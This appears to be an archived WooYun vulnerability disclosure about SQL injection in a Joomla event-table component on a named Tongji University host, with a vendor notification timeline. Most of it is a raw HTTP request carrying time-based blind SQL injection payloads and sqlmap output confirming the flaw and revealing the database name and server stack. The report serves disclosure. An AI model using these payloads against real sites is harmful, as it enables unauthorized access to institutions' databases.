乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 细节已通知厂商并且等待厂商处理中 2015-10-10: 厂商已经确认,细节仅向厂商公开 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
POST /school/index.php?choose=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&Itemid=114&option=com_eventtableedit&page=1&task=saveOrder HTTP/1.1Content-Length: 336Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://mgg.tongji.edu.cn/Cookie: f169de662ae17e9227efc488e098c573=lr44cd5iv9ed5vrasskfnkvkj6; jfcookie[lang]=enHost: mgg.tongji.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*datatparr=DATE;TEXT;dropdown_2;dropdown_1;TEXT&rowedit_0=489&rowedit_1=433&rowedit_10=510&rowedit_11=509&rowedit_12=508&rowedit_13=507&rowedit_14=505&rowedit_15=506&rowedit_16=501&rowedit_17=502&rowedit_18=500&rowedit_19=493&rowedit_2=517&rowedit_3=504&rowedit_4=518&rowedit_5=514&rowedit_6=515&rowedit_7=513&rowedit_8=511&rowedit_9=512
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://mgg.tongji.edu.cn:80/school/index.php?choose=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SELECT(SLEEP(5)))Bjti) AND 'vXeP'='vXeP'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&Itemid=114&option=com_eventtableedit&page=1&task=saveOrder---web server operating system: Windowsweb application technology: PHP 5.2.11, Apache 2.2.11back-end DBMS: MySQL 5.0.12current database: 'mggweb'
危害等级:高
漏洞Rank:15
确认时间:2015-10-10 16:43
感谢提醒!
暂无